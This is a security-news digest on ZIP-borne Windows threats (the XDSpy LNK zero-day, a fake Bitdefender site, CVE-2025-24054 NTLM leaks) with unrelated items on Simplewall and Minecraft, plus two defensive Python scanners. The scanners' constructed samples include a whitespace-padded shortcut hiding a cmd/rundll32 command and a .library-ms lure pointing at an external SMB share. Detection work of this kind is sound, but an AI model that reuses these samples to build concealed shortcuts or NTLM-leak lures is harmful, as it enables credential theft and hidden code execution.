Zip

Winsage
June 18, 2025
A cyber espionage campaign attributed to the XDSpy threat actor has been discovered exploiting a zero-day vulnerability, tracked as ZDI-CAN-25373, in the way Windows handles shortcut (LNK) files. The flaw lets attackers conceal the command a specially crafted shortcut will execute. XDSpy has primarily targeted government entities in Eastern Europe and Russia since its activity became known in 2020. Researchers from HarfangLab found malicious LNK files exploiting this vulnerability in mid-March, exposing issues with how Windows parses LNK files. The infection begins with a ZIP archive containing a malicious LNK file, which triggers a complex Windows shell command that executes the malicious components while displaying a decoy document. This command extracts and executes a first-stage malware called “ETDownloader,” which establishes persistence and downloads a second-stage payload known as “XDigo.” The XDigo implant, written in Go, collects sensitive information and encrypts the data it exfiltrates. This campaign represents an evolution in XDSpy's tactics, combining zero-day exploitation with multi-stage payloads.
Winsage
June 18, 2025
The XDSpy threat actor is exploiting a Windows LNK zero-day vulnerability (ZDI-CAN-25373) to target governmental entities in Eastern Europe and Russia since March 2025. This campaign involves a multi-stage infection chain deploying the XDigo implant, developed in Go. Attackers use spearphishing emails with ZIP archives containing crafted LNK files that exploit the vulnerability. Upon execution, these files sideload a malicious C# .NET DLL named ETDownloader, which establishes persistence and retrieves the XDigo payload from specific domains. XDigo is a data collection implant capable of file scanning, clipboard capture, and screenshot acquisition, communicating with command-and-control servers. The campaign targets Belarusian governmental entities and employs advanced tactics, including anti-analysis checks and encryption for data exfiltration. Indicators of compromise include specific SHA-256 hashes for ZIP archives, LNK files, the ETDownloader, and XDigo malware, along with associated distribution and command-and-control domains.
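A detection-side illustration for the two XDSpy entries above, added here and not code from HarfangLab or from the articles: a minimal MS-SHLLINK parser that pulls the COMMAND_LINE_ARGUMENTS string out of a .lnk file and flags the publicly reported ZDI-CAN-25373 concealment technique, in which the arguments are padded with whitespace-class characters so that the real command sits beyond what the shortcut Properties dialog displays. The padding mechanism, the 64-character threshold and the SW_SHOWMINNOACTIVE heuristic are assumptions not stated on this page, and the two shortcuts are constructed by build_lnk rather than recovered samples.

```python
import struct

# ShellLinkHeader constants from MS-SHLLINK.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7          # target starts minimised; weak indicator, assumption
STRING_ORDER = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                (HAS_ICON_LOCATION, "icon_location"))
# Whitespace-class characters reported to be used as padding in ZDI-CAN-25373 (assumption here).
PAD_CHARS = " \t\r\n\x0b\x0c"


def _string_data(text):
    # StringData entry: CountCharacters (uint16) followed by UTF-16LE characters.
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(arguments, relative_path, show_command=1):
    """Constructed minimal .lnk (no IDList/LinkInfo) used only to exercise the parser."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = (struct.pack("<I", HEADER_SIZE) + LINK_CLSID
              + struct.pack("<II", flags, 0x80)          # LinkFlags, FILE_ATTRIBUTE_NORMAL
              + b"\x00" * 24                             # Creation/Access/Write FILETIMEs
              + struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0))
    assert len(header) == HEADER_SIZE
    return header + _string_data(relative_path) + _string_data(arguments)


def parse_lnk(data):
    """Return header flags, ShowCommand and the StringData fields of a ShellLink file."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a ShellLink (.lnk) file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    off = HEADER_SIZE
    if flags & HAS_ID_LIST:        # LinkTargetIDList: IDListSize (uint16) then the items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:      # LinkInfo: LinkInfoSize (uint32) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "show_command": show_command}
    for flag, key in STRING_ORDER:
        if flags & flag:
            count, = struct.unpack_from("<H", data, off)
            off += 2
            nbytes = count * 2 if unicode else count
            info[key] = data[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252")
            off += nbytes
    return info


def hidden_command_indicators(info, min_padding=64):
    """Return (strong, weak) indicator lists; threshold and heuristics are assumptions."""
    args = info.get("arguments", "")
    strong, weak = [], []
    leading = len(args) - len(args.lstrip(PAD_CHARS))
    if leading >= min_padding:
        strong.append("leading whitespace padding (%d chars)" % leading)
    controls = sorted({c for c in args if c in PAD_CHARS and c != " "})
    if controls:
        strong.append("control characters in arguments: "
                      + " ".join("0x%02x" % ord(c) for c in controls))
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        weak.append("target launched minimised (SW_SHOWMINNOACTIVE)")
    return strong, weak


def scan_lnk(data):
    """Parse one .lnk and return (suspicious, effective_command, indicators)."""
    info = parse_lnk(data)
    strong, weak = hidden_command_indicators(info)
    effective = (info.get("relative_path", "") + " "
                 + info.get("arguments", "").strip(PAD_CHARS)).strip()
    return bool(strong), effective, strong + weak


if __name__ == "__main__":
    # Constructed samples: a plain shortcut and one whose visible arguments are 900 spaces.
    benign = build_lnk("C:\\Users\\Public\\notes.txt", "..\\..\\Windows\\notepad.exe")
    padded = build_lnk(" " * 900 + "\r\n" + '/c start "" decoy.pdf & rundll32 stage1.dll,Run',
                       "..\\..\\Windows\\System32\\cmd.exe", show_command=SW_SHOWMINNOACTIVE)
    for name, blob in (("benign", benign), ("padded", padded)):
        flag, cmd, hits = scan_lnk(blob)
        print(name, "suspicious=%s" % flag, repr(cmd), hits)
```

The parser follows the fixed 76-byte header and the optional LinkTargetIDList and LinkInfo blocks only as far as needed to reach StringData; an unrecognised or truncated file raises rather than guessing. Run it over an extracted ZIP attachment directory before anyone double-clicks anything, and treat the effective command, not the dialog, as the record of what the shortcut does.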
Winsage
June 6, 2025
Simplewall is a rule-based firewall controller for Windows that enhances the Windows Filtering Platform (WFP) without replacing it. It allows users to manage network access for applications and services with a user-friendly interface, supporting advanced features like filtering rules by IP, port, or protocol. Users can create tailored profiles for different scenarios and have comprehensive control over network interactions, including blocking telemetry data and automatic updates. Simplewall is lightweight, portable, and operates without background processes or telemetry, ensuring a straightforward user experience. Setting up simplewall involves downloading it, extracting the files, and enabling filters, allowing users to establish a functional firewall profile quickly. While it offers many advantages, such as being open-source and compatible with older Windows versions, it may be overwhelming for beginners and lacks detailed app profiling compared to premium firewalls.
AppWizard
May 30, 2025
Minecraft allows players to create and explore a vast world using blocks. Players often seek new experiences after repetitive gameplay, leading to a choice between using Minecoins or free mods. Free mods offer infinite content at no cost but require effort to install and manage, particularly for those on consoles or mobile devices. Mods can introduce various features like dragons or minimaps but exist outside the official game framework. Minecoins are the official in-game currency that allows players to purchase vetted content such as worlds, texture packs, and skins, providing convenience and reliability. This option is appealing to casual gamers or those who prefer a hassle-free experience. Players can choose between Minecoins for a seamless experience or free mods for customization and experimentation. Many players use both, combining mods for extensive changes and Minecoins for quick enhancements. The choice depends on individual preferences and playstyles.
Tech Optimizer
May 28, 2025
Cybercriminals are executing a sophisticated malware campaign through a counterfeit Bitdefender antivirus website, specifically the domain “bitdefender-download[.]co,” which mimics the legitimate site. This fraudulent site distributes three types of malware: VenomRAT, StormKitty, and SilentTrinity, aimed at stealing financial data and maintaining persistent access to victims’ computers. When users click the “Download For Windows” button, they inadvertently download a ZIP file containing these malicious programs. VenomRAT acts as a remote access tool, allowing attackers to steal files, cryptocurrency wallets, and browser data, including credit card information. StormKitty quickly harvests sensitive credentials, while SilentTrinity provides stealthy long-term access for further exploitation. The fake Bitdefender site is linked to other malicious domains impersonating banks, indicating a coordinated phishing operation. The attackers utilize the same command and control infrastructure, with the IP address 67.217.228.160:4449 identified as a connection point. Bitdefender is working to take down the fraudulent site, and Google Chrome has begun flagging the link as malicious. Security experts recommend verifying website authenticity and downloading software only from official sources.
Winsage
May 14, 2025
Microsoft's latest update for Windows 11, KB5058411, includes enhancements and security fixes. Key features include AI integration in Windows Search for natural language queries, direct access to Microsoft 365 content in File Explorer (subscription required), improved performance for file opening and ZIP unpacking, and aesthetic updates to the interface. The update also removes the blue background for desktop shortcuts based on user feedback and implements various bug fixes. The update will download and install automatically for Windows 11 24H2 users, with an option for manual installation through Windows Update.
AppWizard
May 3, 2025
Herobrine is a character in Minecraft that players can summon using external modifications, as the game does not support his appearance natively. The Lunar Eclipse Studios’ From The Fog Mod is a popular option for the Java version of Minecraft. To install the mod, players must ensure they are using version 1.20.5 (or 1.20.6) of the game, download the datapack, and follow a series of steps to activate it in-game. Once installed, Herobrine will appear within three in-game days. Players can also build traditional Herobrine shrines to expedite his appearance, requiring specific materials:
1. First shrine:
- 2 Blocks of Gold
- 2 Netherrack
2. Second shrine:
- 9 Blocks of Gold
- 1 Netherrack
- 4 Redstone Torches
Players can gather these materials by mining or crafting:
- Blocks of Gold are crafted from 9 Gold Ingots, which are obtained from Nether Gold Ore.
- Redstone Torches are made from 1 stick and 1 Redstone Dust.
Players can also use commands to switch to Creative Mode for easier material acquisition.
Winsage
April 25, 2025
Files has released an update to version 3.9.7, enhancing its functionality and introducing new customization features. Key improvements include a revamped Release Notes dialog that opens automatically after updates, customizable file size units, automatic encoding detection for ZIP file extraction, and UTF-8 encoding as the default for creating ZIP archives. The app is recognized for introducing features ahead of Windows File Explorer, such as tabs and unique functionalities like diverse view modes, sorting options, and tagging capabilities.
Winsage
April 19, 2025
A vulnerability in Windows, identified as CVE-2025-24054, is being exploited in phishing campaigns targeting government and private organizations. Initially considered low-risk, it was addressed in Microsoft's March 2025 Patch Tuesday updates. Following the release of these patches, Check Point observed a rise in exploitation attempts, particularly linked to the Russian group APT28. Attackers sent phishing emails with Dropbox links containing .library-ms files, which, when accessed, connected to an external SMB server controlled by the attackers, allowing interception of NTLM hashes. A subsequent wave of attacks involved .library-ms files sent as direct attachments, requiring minimal user interaction to exploit the vulnerability. The malicious ZIP archive also contained files exploiting older NTLM vulnerabilities. Check Point identified the attackers' SMB servers with specific IP addresses. Despite being classified as medium-severity, the vulnerability's potential impact is significant, prompting organizations to apply the March 2025 updates and consider disabling NTLM authentication if not essential.
Winsage
April 17, 2025
A vulnerability in Windows, identified as CVE-2025-24054, is being actively exploited in phishing campaigns targeting government and private sectors. Initially addressed in Microsoft's March 2025 Patch Tuesday, it was not considered actively exploited at that time. Researchers from Check Point reported increased exploitation activities shortly after the patches were released, particularly between March 20 and 25, 2025. Some attacks were linked to the Russian state-sponsored group APT28, but definitive attribution is lacking. The vulnerability allows attackers to capture NTLM hashes through phishing emails containing manipulated .library-ms files that trigger the flaw when interacted with. Check Point noted that subsequent attacks involved .library-ms files sent directly, requiring minimal user interaction to exploit. The malicious files also included additional components that exploit older vulnerabilities related to NTLM hash leaks. The attacker-controlled SMB servers were traced to specific IP addresses. Although rated as medium severity, the potential for authentication bypass and privilege escalation makes it a significant concern, prompting recommendations for organizations to install updates and disable NTLM authentication if not necessary.
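For the two CVE-2025-24054 entries above (April 17 and April 19), an added triage example that is not code from Check Point or the articles: a .library-ms file is an XML library description, and the phishing lure works by pointing one of its locations at an attacker-controlled SMB server so that Explorer authenticates outbound with NTLM. The scanner below extracts every `<url>` from such a file and reports UNC paths that lead outside RFC 1918, loopback and link-local space or to a hostname outside an allowlisted internal suffix. The samples are constructed, the external address is from the RFC 5737 documentation range rather than any IP from the reports, and the internal-suffix allowlist is an assumption.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Namespace used by Windows library description files.
LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# Address space treated as internal; a UNC target anywhere else leaks NTLM to the internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "fc00::/7", "::1/128")]

# Constructed lure: one searchConnectorDescription whose location is a remote share.
SAMPLE_MALICIOUS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\\\203.0.113.25\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed benign library pointing at a known folder (assumed: the Documents GUID).
SAMPLE_BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def _local(tag):
    # Drop the "{namespace}" prefix ElementTree puts on qualified tag names.
    return tag.rsplit("}", 1)[-1]


def extract_locations(xml_text):
    """Return every <url> text in document order, whatever namespace prefix is used."""
    root = ET.fromstring(xml_text)   # stdlib expat does not fetch external entities or DTDs
    return [el.text.strip() for el in root.iter() if _local(el.tag) == "url" and el.text]


def classify_location(url, internal_suffixes=(".corp.example",)):
    """Return (kind, host); kind is knownfolder, local, unc-internal, unc-external or other."""
    if url.lower().startswith("knownfolder:"):
        return "knownfolder", None
    if url.startswith("\\\\") or url.startswith("//"):
        host = url.replace("/", "\\").lstrip("\\").split("\\", 1)[0]
        host = host.split("@", 1)[0]            # strip host@SSL / host@port WebDAV suffixes
        try:
            ip = ipaddress.ip_address(host)
            internal = any(ip in net for net in INTERNAL_NETS)
        except ValueError:
            lower = host.lower()                # bare NetBIOS names resolve internally
            internal = "." not in lower or lower.endswith(tuple(internal_suffixes))
        return ("unc-internal" if internal else "unc-external"), host
    if len(url) > 1 and url[1] == ":":
        return "local", None
    return "other", None


def scan_library_ms(xml_text, internal_suffixes=(".corp.example",)):
    """Return [(url, kind, host)] for every location that would send NTLM off-network."""
    findings = []
    for url in extract_locations(xml_text):
        kind, host = classify_location(url, internal_suffixes)
        if kind == "unc-external":
            findings.append((url, kind, host))
    return findings


if __name__ == "__main__":
    for label, doc in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, scan_library_ms(doc))
```

A hit here is a reason to block the attachment at the gateway, and the complementary controls named in the entries above still apply: install the March 2025 update, deny outbound TCP 445 at the perimeter so the authentication attempt never leaves the network, and disable NTLM where it is not required.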